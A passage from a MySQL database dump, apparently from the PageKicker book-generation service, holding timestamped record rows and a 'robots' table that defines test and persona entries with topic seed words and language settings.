18:50:40', 256, 'en_US.UTF-8'),\n(391, 'f191c688-0de0-11e3-8ade-12313d16658b', '2013-08-25 23:49:13', 257, 'en_US.UTF-8'),\n(391, '75e912b4-0e69-11e3-a756-12313d16658b', '2013-08-26 16:06:27', 258, 'en_US.UTF-8'),\n(391, '657cc790-0e73-11e3-8912-12313d16658b', '2013-08-26 17:17:34', 259, 'en_US.UTF-8'),\n(391, 'ae7b530e-0e77-11e3-a710-12313d16658b', '2013-08-26 17:48:14', 260, 'en_US.UTF-8'),\n(391, '13fc1f5e-0e7a-11e3-b56c-12313d16658b', '2013-08-26 18:05:24', 261, 'en_US.UTF-8'),\n(391, '6c978d88-0e7a-11e3-a642-12313d16658b', '2013-08-26 18:07:52', 262, 'en_US.UTF-8'),\n(391, 'd6c1cd72-0e7a-11e3-8991-12313d16658b', '2013-08-26 18:10:51', 263, 'en_US.UTF-8'),\n(391, 'b8caf7d4-0e7b-11e3-91b7-12313d16658b', '2013-08-26 18:17:10', 264, 'en_US.UTF-8'),\n(391, '061586c6-0e7c-11e3-b63f-12313d16658b', '2013-08-26 18:19:19', 265, 'en_US.UTF-8'),\n(391, '58923d90-0e7c-11e3-b1f3-12313d16658b', '2013-08-26 18:21:38', 266, 'en_US.UTF-8'),\n(392, 'c40c030c-0e7d-11e3-b1a8-12313d16658b', '2013-08-26 18:31:48', 267, 'en_US.UTF-8'),\n(392, '0677a448-0e7f-11e3-8290-12313d16658b', '2013-08-26 18:40:49', 268, 'en_US.UTF-8'),\n(392, '79acfd98-0e82-11e3-823e-12313d16658b', '2013-08-26 19:05:30', 269, 'en_US.UTF-8'),\n(392, 'd2b08eb8-0e83-11e3-89e2-12313d16658b', '2013-08-26 19:15:08', 270, 'en_US.UTF-8'),\n(0, '96de1148-0e84-11e3-a54a-12313d16658b', '2013-08-26 19:20:38', 271, 'en_US.UTF-8'),\n(0, '9eaf03a0-0e84-11e3-acfa-12313d16658b', '2013-08-26 19:20:51', 272, 'en_US.UTF-8'),\n(392, 'b2090778-0e86-11e3-8b78-12313d16658b', '2013-08-26 19:35:42', 273, 'en_US.UTF-8'),\n(392, 'b6c40d3a-0e86-11e3-94a0-12313d16658b', '2013-08-26 19:35:50', 274, 'en_US.UTF-8'),\n(393, 'e3e7dd4a-0e87-11e3-8496-12313d16658b', '2013-08-26 19:44:15', 275, 'en_US.UTF-8'),\n(393, '9ddd65fe-0f45-11e3-8c03-12313d16658b', '2013-08-27 18:22:23', 276, 'en_US.UTF-8'),\n(398, 'e2e23ff8-14a9-11e3-92e5-12313d16658b', '2013-09-03 15:02:45', 277, 'en_US.UTF-8'),\n(398, '6bebd944-14aa-11e3-8a0a-12313d16658b', '2013-09-03 15:06:34', 278, 'en_US.UTF-8'),\n(398, 'ca5d05fc-14aa-11e3-ad2a-12313d16658b', '2013-09-03 15:09:13', 279, 'en_US.UTF-8'),\n(398, 'b54288b2-14b0-11e3-b1be-12313d16658b', '2013-09-03 15:51:34', 280, 'en_US.UTF-8'),\n(398, '8d4c1a62-14c9-11e3-9e42-12313d16658b', '2013-09-03 18:49:25', 281, 'en_US.UTF-8'),\n(398, 'a15374b8-14fd-11e3-b116-12313d16658b', '2013-09-04 01:02:12', 282, 'en_US.UTF-8'),\n(398, '0294d38e-14fe-11e3-acf3-12313d16658b', '2013-09-04 01:04:55', 283, 'en_US.UTF-8'),\n(398, '20cd8814-1562-11e3-a9b7-12313d16658b', '2013-09-04 13:01:36', 284, 'en_US.UTF-8'),\n(398, 'd186ee2e-1563-11e3-9940-12313d16658b', '2013-09-04 13:13:42', 285, 'en_US.UTF-8'),\n(398, 'a30e584c-1564-11e3-ad8c-12313d16658b', '2013-09-04 13:19:33', 286, 'en_US.UTF-8'),\n(398, '84e5ba7e-1567-11e3-9c02-12313d16658b', '2013-09-04 13:40:11', 287, 
'en_US.UTF-8'),\n(398, 'b29f4e48-156d-11e3-8858-12313d16658b', '2013-09-04 14:24:25', 288, 'en_US.UTF-8'),\n(398, '527b6974-156e-11e3-b6e9-12313d16658b', '2013-09-04 14:28:53', 289, 'en_US.UTF-8'),\n(398, '94528e4c-1571-11e3-938e-12313d16658b', '2013-09-04 14:52:12', 290, 'en_US.UTF-8'),\n(398, 'e3873950-1575-11e3-9dd4-12313d16658b', '2013-09-04 15:23:03', 291, 'en_US.UTF-8'),\n(398, '2540315a-1579-11e3-8fd8-12313d16658b', '2013-09-04 15:46:22', 292, 'en_US.UTF-8'),\n(398, '6c0f96e8-1579-11e3-8659-12313d16658b', '2013-09-04 15:48:21', 293, 'en_US.UTF-8'),\n(398, 'd00753f6-157a-11e3-a950-12313d16658b', '2013-09-04 15:58:18', 294, 'en_US.UTF-8'),\n(398, '294c743c-157b-11e3-a212-12313d16658b', '2013-09-04 16:00:47', 295, 'en_US.UTF-8'),\n(398, 'c090c1a2-157d-11e3-a31b-12313d16658b', '2013-09-04 16:19:20', 296, 'en_US.UTF-8'),\n(398, '1d898696-157e-11e3-b1c5-12313d16658b', '2013-09-04 16:21:56', 297, 'en_US.UTF-8'),\n(398, '80261bb6-157e-11e3-abb1-12313d16658b', '2013-09-04 16:24:43', 298, 'en_US.UTF-8'),\n(398, '730d28ec-157f-11e3-bc99-12313d16658b', '2013-09-04 16:31:28', 299, 'en_US.UTF-8'),\n(398, 'a8800602-157f-11e3-b158-12313d16658b', '2013-09-04 16:32:58', 300, 'en_US.UTF-8'),\n(398, 'fc3dac88-1582-11e3-bd23-12313d16658b', '2013-09-04 16:56:48', 301, 'en_US.UTF-8'),\n(398, '6ee8e7b4-1585-11e3-93cc-12313d16658b', '2013-09-04 17:14:19', 302, 'en_US.UTF-8'),\n(398, 'b86bf542-1586-11e3-8488-12313d16658b', '2013-09-04 17:23:32', 303, 'en_US.UTF-8'),\n(398, 'ab191720-1587-11e3-8b07-12313d16658b', '2013-09-04 17:30:19', 304, 'en_US.UTF-8'),\n(399, 'd6ad394e-15a4-11e3-84a9-12313d16658b', '2013-09-04 20:59:08', 305, 'en_US.UTF-8'),\n(399, '5c30595e-15cb-11e3-8655-12313d16658b', '2013-09-05 01:34:52', 306, 'en_US.UTF-8'),\n(399, '75c15dbe-15cb-11e3-9bab-12313d16658b', '2013-09-05 01:35:36', 307, 'en_US.UTF-8'),\n(399, 'e2625f62-15cc-11e3-8a6a-12313d16658b', '2013-09-05 01:45:47', 308, 'en_US.UTF-8'),\n(399, '5bb8453e-15cd-11e3-bef3-12313d16658b', '2013-09-05 01:49:11', 309, 'en_US.UTF-8'),\n(399, '1cc64aa0-162d-11e3-ad59-12313d16658b', '2013-09-05 13:14:37', 310, 'en_US.UTF-8'),\n(399, '5b5df91a-162e-11e3-a740-12313d16658b', '2013-09-05 13:23:31', 311, 'en_US.UTF-8'),\n(399, '525aa920-162f-11e3-84da-12313d16658b', '2013-09-05 13:30:26', 312, 'en_US.UTF-8'),\n(399, '1cacba60-1630-11e3-a023-12313d16658b', '2013-09-05 13:36:05', 313, 'en_US.UTF-8'),\n(399, '4317d91e-1630-11e3-aa66-12313d16658b', '2013-09-05 13:37:09', 314, 'en_US.UTF-8'),\n(399, 'bf72deac-1633-11e3-ba6a-12313d16658b', '2013-09-05 14:02:07', 315, 'en_US.UTF-8'),\n(399, '5bf56ffa-1635-11e3-a816-12313d16658b', '2013-09-05 14:13:39', 316, 'en_US.UTF-8'),\n(399, '121e682c-1636-11e3-b1fc-12313d16658b', '2013-09-05 14:18:44', 317, 'en_US.UTF-8'),\n(399, '223f3488-1637-11e3-855e-12313d16658b', '2013-09-05 14:26:21', 318, 'en_US.UTF-8'),\n(399, 'd286e5ac-1637-11e3-89ac-12313d16658b', '2013-09-05 14:31:17', 319, 'en_US.UTF-8'),\n(399, 'e251dba8-1638-11e3-b177-12313d16658b', '2013-09-05 14:38:53', 320, 'en_US.UTF-8'),\n(399, '2bf9df0c-163a-11e3-860d-12313d16658b', '2013-09-05 14:48:06', 321, 'en_US.UTF-8'),\n(399, 'd5614634-163a-11e3-a917-12313d16658b', '2013-09-05 14:52:50', 322, 'en_US.UTF-8'),\n(399, '3f5be490-163b-11e3-9d57-12313d16658b', '2013-09-05 14:55:48', 323, 'en_US.UTF-8'),\n(399, 'ac2c1080-163c-11e3-a017-12313d16658b', '2013-09-05 15:06:00', 324, 'en_US.UTF-8'),\n(399, '3e139486-1652-11e3-8773-12313d16658b', '2013-09-05 17:40:24', 325, 'en_US.UTF-8'),\n(399, '8776000a-1652-11e3-9b97-12313d16658b', '2013-09-05 17:42:26', 326, 
'en_US.UTF-8'),\n(401, '9d885784-1653-11e3-82f9-12313d16658b', '2013-09-05 17:50:13', 327, 'en_US.UTF-8'),\n(401, '01b10e40-1654-11e3-b7af-12313d16658b', '2013-09-05 17:53:01', 328, 'en_US.UTF-8'),\n(401, '415323e4-1654-11e3-9fc2-12313d16658b', '2013-09-05 17:54:48', 329, 'en_US.UTF-8'),\n(401, '377e725a-1655-11e3-bf12-12313d16658b', '2013-09-05 18:01:41', 330, 'en_US.UTF-8'),\n(402, '503b0068-1657-11e3-9da4-12313d16658b', '2013-09-05 18:16:41', 331, 'en_US.UTF-8'),\n(402, 'df5c1480-1657-11e3-9b5f-12313d16658b', '2013-09-05 18:20:41', 332, 'en_US.UTF-8'),\n(402, '447a6446-165a-11e3-90be-12313d16658b', '2013-09-05 18:37:50', 333, 'en_US.UTF-8'),\n(399, '7181187e-168f-11e3-bd25-12313d16658b', '2013-09-06 00:58:30', 334, 'en_US.UTF-8'),\n(402, '30ce583e-1719-11e3-b78f-12313d16658b', '2013-09-06 17:24:31', 335, ''),\n(402, '46f7094e-1719-11e3-9843-12313d16658b', '2013-09-06 17:25:08', 336, ''),\n(402, '5ccb4b4a-1719-11e3-868d-12313d16658b', '2013-09-06 17:25:44', 337, ''),\n(402, '8aee4b76-1719-11e3-aaa1-12313d16658b', '2013-09-06 17:27:02', 338, 'it_IT.UTF-8'),\n(402, '37826cd2-171a-11e3-a056-12313d16658b', '2013-09-06 17:31:51', 339, 'it_IT.UTF-8'),\n(402, '0339d360-1734-11e3-ba29-12313d16658b', '2013-09-06 20:36:31', 340, 'it_IT.UTF-8'),\n(402, '7bab5da0-1734-11e3-b4c2-12313d16658b', '2013-09-06 20:39:53', 341, 'it_IT.UTF-8'),\n(404, 'cfccb490-1975-11e3-ae48-12313d16658b', '2013-09-09 17:32:35', 342, ''),\n(404, '17085cd2-1977-11e3-be70-12313d16658b', '2013-09-09 17:41:43', 343, ''),\n(404, '25d19378-1977-11e3-885c-12313d16658b', '2013-09-09 17:42:07', 344, ''),\n(404, '4f658d3e-1a17-11e3-9175-12313d16658b', '2013-09-10 12:48:38', 345, 'en_US.UTF-8'),\n(399, 'b60d6b2c-1a6e-11e3-a5e9-12313d16658b', '2013-09-10 23:14:16', 346, 'en_US.UTF-8'),\n(404, '116afd58-1a70-11e3-b063-12313d16658b', '2013-09-10 23:23:58', 347, 'en_US.UTF-8'),\n(406, '65e8e300-1b0a-11e3-9080-12313d16658b', '2013-09-11 17:48:42', 348, 'en_US.UTF-8'),\n(406, '73c0760e-1b0b-11e3-ad38-12313d16658b', '2013-09-11 17:56:15', 349, 'en_US.UTF-8'),\n(406, '49d7b568-1b0c-11e3-ab8a-12313d16658b', '2013-09-11 18:02:14', 350, 'en_US.UTF-8'),\n(406, '00b35b34-1b0d-11e3-b97d-12313d16658b', '2013-09-11 18:07:21', 351, 'en_US.UTF-8'),\n(406, '427403ca-1b0d-11e3-8923-12313d16658b', '2013-09-11 18:09:11', 352, 'en_US.UTF-8'),\n(406, '79ad0a08-1b0d-11e3-9c59-12313d16658b', '2013-09-11 18:10:44', 353, 'en_US.UTF-8'),\n(407, 'b33ee154-1b14-11e3-9cda-12313d16658b', '2013-09-11 19:02:28', 354, 'en_US.UTF-8'),\n(407, 'bf3a56b8-1b15-11e3-bdd2-12313d16658b', '2013-09-11 19:09:56', 355, 'en_US.UTF-8'),\n(407, 'b4559a4a-1b16-11e3-9bf4-12313d16658b', '2013-09-11 19:16:48', 356, 'en_US.UTF-8'),\n(407, 'ff8b5e90-1b17-11e3-8179-12313d16658b', '2013-09-11 19:26:03', 357, 'en_US.UTF-8'),\n(407, '0a15d560-1b19-11e3-bae6-12313d16658b', '2013-09-11 19:33:30', 358, 'en_US.UTF-8'),\n(407, '5eb9b0aa-1b1e-11e3-b39a-12313d16658b', '2013-09-11 20:11:40', 359, 'en_US.UTF-8'),\n(407, '8827481c-1b1e-11e3-9013-12313d16658b', '2013-09-11 20:12:49', 360, 'en_US.UTF-8'),\n(407, '9c4a4ac6-1b3f-11e3-9178-12313d16658b', '2013-09-12 00:09:37', 361, 'en_US.UTF-8'),\n(407, '07decd90-1bc0-11e3-8fcb-12313d16658b', '2013-09-12 15:28:54', 362, 'en_US.UTF-8'),\n(407, '9bf73c0e-1bc2-11e3-a932-12313d16658b', '2013-09-12 15:47:21', 363, 'en_US.UTF-8'),\n(407, '635500d8-1bc3-11e3-aaeb-12313d16658b', '2013-09-12 15:52:56', 364, 'en_US.UTF-8'),\n(407, '97bdf634-1bc5-11e3-8c56-12313d16658b', '2013-09-12 16:08:43', 365, 'en_US.UTF-8'),\n(407, 'f32c58d2-1be6-11e3-ae92-12313d16658b', 
'2013-09-12 20:07:29', 366, ''),\n(407, '997d36d4-1be7-11e3-b475-12313d16658b', '2013-09-12 20:12:07', 367, 'it_IT.UTF-8'),\n(407, '6791b932-1be8-11e3-9e05-12313d16658b', '2013-09-12 20:17:54', 368, 'it_IT.UTF-8'),\n(407, '51bcec7a-1be9-11e3-911a-12313d16658b', '2013-09-12 20:24:27', 369, 'en_US.UTF-8'),\n(407, '57a47b58-1be9-11e3-b989-12313d16658b', '2013-09-12 20:24:36', 370, 'it_IT.UTF-8'),\n(407, '68151d1c-1be9-11e3-8934-12313d16658b', '2013-09-12 20:25:04', 371, 'en_US.UTF-8'),\n(407, '76b8391c-1be9-11e3-b002-12313d16658b', '2013-09-12 20:25:29', 372, 'en_US.UTF-8'),\n(407, 'ee0c06a2-1c3d-11e3-b33f-12313d16658b', '2013-09-13 06:30:07', 373, ''),\n(410, 'd024839e-216a-11e3-bb93-12313d16658b', '2013-09-19 20:34:00', 374, 'en_US.UTF-8'),\n(410, 'a99e8eba-2221-11e3-9441-12313d16658b', '2013-09-20 18:22:52', 375, 'en_US.UTF-8'),\n(410, 'f7867468-2239-11e3-a757-12313d16658b', '2013-09-20 21:16:52', 376, 'en_US.UTF-8'),\n(410, 'd7a04c0a-226b-11e3-b594-12313d16658b', '2013-09-21 03:13:53', 377, ''),\n(410, '5e49c96a-23e4-11e3-a255-12313d16658b', '2013-09-23 00:09:10', 378, 'en_US.UTF-8'),\n(410, '4bbbf35a-2492-11e3-81ea-12313d16658b', '2013-09-23 20:54:12', 379, 'en_US.UTF-8'),\n(410, 'f095ff5c-24af-11e3-94e5-12313d16658b', '2013-09-24 00:26:22', 380, 'en_US.UTF-8'),\n(410, 'f8359498-24af-11e3-a6d8-12313d16658b', '2013-09-24 00:26:35', 381, 'en_US.UTF-8'),\n(410, 'c9fdbd34-253c-11e3-a605-12313d16658b', '2013-09-24 17:14:38', 382, 'en_US.UTF-8'),\n(413, '593fcd2c-260d-11e3-acc9-12313d16658b', '2013-09-25 18:07:34', 383, 'en_US.UTF-8'),\n(413, 'dab602ae-260d-11e3-9109-12313d16658b', '2013-09-25 18:11:09', 384, 'en_US.UTF-8'),\n(413, 'e002852a-260d-11e3-a267-12313d16658b', '2013-09-25 18:11:18', 385, 'en_US.UTF-8'),\n(413, 'bf2fa53c-2610-11e3-8726-12313d16658b', '2013-09-25 18:31:52', 386, 'en_US.UTF-8'),\n(413, 'c5fde37e-2610-11e3-bdc6-12313d16658b', '2013-09-25 18:32:04', 387, ''),\n(413, 'd744c3f0-2610-11e3-a337-12313d16658b', '2013-09-25 18:32:33', 388, 'en_US.UTF-8'),\n(413, 'dd180a62-2610-11e3-b974-12313d16658b', '2013-09-25 18:32:43', 389, 'en_US.UTF-8'),\n(413, 'e07e4234-2610-11e3-b653-12313d16658b', '2013-09-25 18:32:48', 390, 'en_US.UTF-8'),\n(414, '343121ca-278e-11e3-9564-12313d16658b', '2013-09-27 16:02:26', 391, 'en_US.UTF-8'),\n(414, '0773015a-2791-11e3-97b5-12313d16658b', '2013-09-27 16:22:40', 392, 'en_US.UTF-8'),\n(414, '0e956c10-2792-11e3-aca2-12313d16658b', '2013-09-27 16:30:01', 393, 'en_US.UTF-8'),\n(415, '597f692e-2797-11e3-8e54-12313d16658b', '2013-09-27 17:07:54', 394, 'en_US.UTF-8'),\n(415, '34d2d312-2798-11e3-b096-12313d16658b', '2013-09-27 17:14:02', 395, 'en_US.UTF-8'),\n(415, '2355f8a2-2799-11e3-a8e1-12313d16658b', '2013-09-27 17:20:42', 396, 'en_US.UTF-8'),\n(415, '866d81bc-2799-11e3-927b-12313d16658b', '2013-09-27 17:23:29', 397, 'en_US.UTF-8'),\n(415, '818a2cda-279a-11e3-a9f2-12313d16658b', '2013-09-27 17:30:30', 398, 'en_US.UTF-8'),\n(414, '4e4cec68-27ae-11e3-b0fc-12313d16658b', '2013-09-27 19:52:15', 399, 'en_US.UTF-8'),\n(414, 'eeb708ae-27fa-11e3-9018-12313d16658b', '2013-09-28 05:00:46', 400, ''),\n(414, '0d60f030-28a0-11e3-a325-12313d16658b', '2013-09-29 00:42:43', 401, 'en_US.UTF-8'),\n(415, 'a5d05428-29d1-11e3-be8a-12313d16658b', '2013-09-30 13:10:17', 402, 'en_US.UTF-8'),\n(415, 'da736336-29eb-11e3-8eb4-12313d16658b', '2013-09-30 16:17:51', 403, 'en_US.UTF-8'),\n(415, '4c437428-29ed-11e3-84ec-12313d16658b', '2013-09-30 16:28:11', 404, 'en_US.UTF-8'),\n(415, '41c6cfa2-29ef-11e3-8fa7-12313d16658b', '2013-09-30 16:42:12', 405, 'en_US.UTF-8'),\n(415, 
'aac7b200-29ef-11e3-b5d9-12313d16658b', '2013-09-30 16:45:09', 406, 'en_US.UTF-8'),\n(415, '6b99380a-29f0-11e3-8d19-12313d16658b', '2013-09-30 16:50:32', 407, 'en_US.UTF-8'),\n(415, 'cec5d990-29f2-11e3-a1df-12313d16658b', '2013-09-30 17:07:37', 408, 'en_US.UTF-8'),\n(415, '12e27f66-29f3-11e3-8a48-12313d16658b', '2013-09-30 17:09:32', 409, 'en_US.UTF-8'),\n(415, '3bd362e6-29f3-11e3-ae2e-12313d16658b', '2013-09-30 17:10:40', 410, 'en_US.UTF-8'),\n(415, 'dc12aa46-29f3-11e3-aa09-12313d16658b', '2013-09-30 17:15:09', 411, 'en_US.UTF-8'),\n(415, '07bb02be-29f5-11e3-80c1-12313d16658b', '2013-09-30 17:23:32', 412, 'en_US.UTF-8'),\n(415, 'b34e6b84-29f5-11e3-bd52-12313d16658b', '2013-09-30 17:28:20', 413, 'en_US.UTF-8'),\n(415, '18567fd0-29f6-11e3-9929-12313d16658b', '2013-09-30 17:31:09', 414, 'en_US.UTF-8'),\n(415, '688804c4-29fb-11e3-9cb2-12313d16658b', '2013-09-30 18:09:11', 415, 'en_US.UTF-8'),\n(415, '705b31bc-29fb-11e3-a106-12313d16658b', '2013-09-30 18:09:24', 416, 'en_US.UTF-8'),\n(415, '75f9c0ac-29fb-11e3-9137-12313d16658b', '2013-09-30 18:09:34', 417, 'en_US.UTF-8'),\n(415, '33269646-29fc-11e3-bc06-12313d16658b', '2013-09-30 18:14:51', 418, 'en_US.UTF-8'),\n(415, 'af4dc49c-29fc-11e3-bcc5-12313d16658b', '2013-09-30 18:18:20', 419, 'en_US.UTF-8'),\n(415, '300dff60-29fe-11e3-8355-12313d16658b', '2013-09-30 18:29:05', 420, 'en_US.UTF-8'),\n(415, 'e3efb866-29fe-11e3-876a-12313d16658b', '2013-09-30 18:34:07', 421, 'en_US.UTF-8'),\n(415, '4c1fdb54-2a00-11e3-8c6e-12313d16658b', '2013-09-30 18:44:11', 422, 'en_US.UTF-8'),\n(415, '510983da-2a01-11e3-9f81-12313d16658b', '2013-09-30 18:51:29', 423, 'en_US.UTF-8'),\n(415, 'c1cdf268-2a01-11e3-a0bd-12313d16658b', '2013-09-30 18:54:38', 424, 'en_US.UTF-8'),\n(415, '372c7002-2a02-11e3-b3fd-12313d16658b', '2013-09-30 18:57:55', 425, 'en_US.UTF-8'),\n(416, 'bd81a026-2a13-11e3-8b18-12313d16658b', '2013-09-30 21:03:22', 426, 'en_US.UTF-8'),\n(415, '2da93806-2a72-11e3-a2c9-12313d16658b', '2013-10-01 08:19:24', 427, 'en_US.UTF-8'),\n(417, '151c5174-2ab3-11e3-81e0-12313d16658b', '2013-10-01 16:03:59', 428, 'en_US.UTF-8'),\n(417, '026cd5c0-2ab4-11e3-b089-12313d16658b', '2013-10-01 16:10:37', 429, 'en_US.UTF-8'),\n(417, '3ba636e2-2ab4-11e3-92a1-12313d16658b', '2013-10-01 16:12:13', 430, 'en_US.UTF-8'),\n(417, '1750a83e-2abb-11e3-8da7-12313d16658b', '2013-10-01 17:01:19', 431, 'en_US.UTF-8'),\n(417, '69ac8670-2abb-11e3-be4d-12313d16658b', '2013-10-01 17:03:37', 432, 'en_US.UTF-8'),\n(417, '385fea84-2d46-11e3-976b-12313d16658b', '2013-10-04 22:42:17', 433, ''),\n(415, 'd93bb9a4-2d7f-11e3-b108-12313d16658b', '2013-10-05 05:34:49', 434, ''),\n(418, 'bdee9f36-2f69-11e3-92ef-12313d16658b', '2013-10-07 16:01:35', 435, ''),\n(418, 'bb64edcc-3001-11e3-8dbc-12313d16658b', '2013-10-08 10:09:34', 436, ''),\n(428, '36a59cd0-3673-11e3-9414-12313d16658b', '2013-10-16 14:57:03', 437, 'en_US.UTF-8'),\n(428, '3db3808c-3673-11e3-91e7-12313d16658b', '2013-10-16 14:57:14', 438, 'en_US.UTF-8'),\n(436, 'c5cfa3a0-3b83-11e3-9931-12313d16658b', '2013-10-23 01:38:09', 439, 'en_US.UTF-8'),\n(436, '36c75cc4-3b84-11e3-b800-12313d16658b', '2013-10-23 01:41:19', 440, 'en_US.UTF-8'),\n(436, '2ef6f676-3c47-11e3-8e23-12313d16658b', '2013-10-24 00:56:58', 441, 'en_US.UTF-8');\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `robots`\n--\n\nCREATE TABLE IF NOT EXISTS `robots` (\n `robot_id` int(11) NOT NULL AUTO_INCREMENT,\n `robot_name` text NOT NULL,\n `robot_bio` text NOT NULL,\n `robot_dedication` text NOT NULL,\n `robot_summarizer_on` text NOT 
NULL,\n `robot_positive_summary_seed` text NOT NULL,\n `robot_positive_summary_seed_weight` int(11) NOT NULL,\n `robot_summary_length` int(11) NOT NULL DEFAULT '10',\n `robot_negative_seeds` text NOT NULL,\n `robot_negative_seed_weight` int(11) NOT NULL,\n `robot_coverfont` text NOT NULL,\n `robot_covercolor` text NOT NULL,\n `robot_userlogo_path` text NOT NULL,\n `robot_image_path` text NOT NULL,\n `robot_first_name` text NOT NULL,\n `robot_middle_name` text NOT NULL,\n `robot_last_name` text NOT NULL,\n `robot_fortune_db` text NOT NULL,\n `robot_ngram_threshold` int(11) NOT NULL DEFAULT '2',\n `robot_language` enum('en_US.UTF-8','cs_CZ.UTF-8','it_IT.UTF-8') NOT NULL DEFAULT 'en_US.UTF-8',\n `robot_booktype` enum('Reader') NOT NULL DEFAULT 'Reader',\n `robot_rows` int(11) NOT NULL,\n `robot_experience_points_initial` int(11) NOT NULL,\n `robot_experience_points_now` int(11) NOT NULL DEFAULT '100',\n `robot_ner_preferences` enum('AlchemyAPI','experimental','none') NOT NULL,\n PRIMARY KEY (`robot_id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=28 ;\n\n--\n-- Dumping data for table `robots`\n--\n\nINSERT INTO `robots` (`robot_id`, `robot_name`, `robot_bio`, `robot_dedication`, `robot_summarizer_on`, `robot_positive_summary_seed`, `robot_positive_summary_seed_weight`, `robot_summary_length`, `robot_negative_seeds`, `robot_negative_seed_weight`, `robot_coverfont`, `robot_covercolor`, `robot_userlogo_path`, `robot_image_path`, `robot_first_name`, `robot_middle_name`, `robot_last_name`, `robot_fortune_db`, `robot_ngram_threshold`, `robot_language`, `robot_booktype`, `robot_rows`, `robot_experience_points_initial`, `robot_experience_points_now`, `robot_ner_preferences`) VALUES\n(1, 'Dummy', '', '', '', '', 0, 10, '', 0, '', '', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 0, 100, 100, ''),\n(2, 'Stubby', 'the robot', '', '', '', 0, 10, '', 0, '', '', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 0, 100, 100, ''),\n(3, 'sm', 'asd', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(4, 'Test Robot', 'Hates Ohio!', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(5, 'Ming the merciless', 'edits ruthlessly', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'cs_CZ.UTF-8', 'Reader', 15, 100, 100, ''),\n(6, 'Hamburger helper', 'recipe', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(7, 'Mung', 'Mung', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(8, 'Basher', 'zoof', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(9, 'POw', 'pow', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(10, 'Larry', 'lasd', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(11, 'Rotary Randy', 'asdf', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(12, 'Ken robot', 'sd', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(13, 'Emile Zola', '', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(14, 
'Jack London', '', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(15, 'Erle Stanley Gardner', '', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 120, 100, ''),\n(16, 'red line', '', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(17, 'Justinius Legem', '', '', '', '', 0, 10, '', 0, 'Random', 'Random', 'userassets/wk/wk.jpg', 'userassets/wk/Justinian.jpg', 'Justinius', '', 'Legem', '', 2, 'it_IT.UTF-8', 'Reader', 15, 100, 100, ''),\n(18, 'Jellicoe', '', '', 'Y', 'navy', 0, 15, '', 0, '', 'Random', '', '', '', '', '', '', 0, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(19, 'Hannibal Lecter', '', '', 'Y', 'cannibal', 0, 5, '', 0, '', 'Random', '', '', '', '', '', '', 0, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(20, 'Lex Luthor', '', '', 'Y', 'bald', 1000, 25, '', 0, '', 'Random', '', '', '', '', '', '', 0, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(21, 'Telly Savalas', '', '', 'Y', 'bald', 1000, 15, 'hair', 10001, '', 'Random', '', '', '', '', '', '', 0, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(22, 'TSA Tony', '', '', 'Y', 'terrorism', 1000, 15, 'liberty', 10000, '3', 'Random', '', '', '', '', '', '', 0, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(23, 'Spammyh', '', '', 'Y', 'Nigeria', 10, 10, 'police', 10, 'Random', 'Random', '', '', '', '', '', '', 3, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(24, 'Bernardo', 'He is from Italy!', '', 'Y', 'diritto', 3, 10, 'di', 0, 'Random', 'Random', '', '', '', '', '', '', 3, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(25, 'TSA Tommy', 'Tommy is a robot who writes about homeland security.', '', 'Y', 'terrorism', 1, 10, 'liberty', 1, 'Random', 'Random', '', '', '', '', '', '', 3, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(26, 'test', 'test', '', 'Y', '', 1, 10, '', 1, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(27, 'Fast Heinz', 'PageKicker robot Fast Heinz specializes in the military history of World War II with an emphasis on armored warfare and German forces.', '', 'Y', 'wehrmacht panzer armor ', 5, 10, 'medieval nazi', 3, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, 'AlchemyAPI');\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `seeds`\n--\n\nCREATE TABLE IF NOT EXISTS `seeds` (\n `uuid` mediumtext NOT NULL,\n `seed` mediumtext NOT NULL,\n `seedsource` 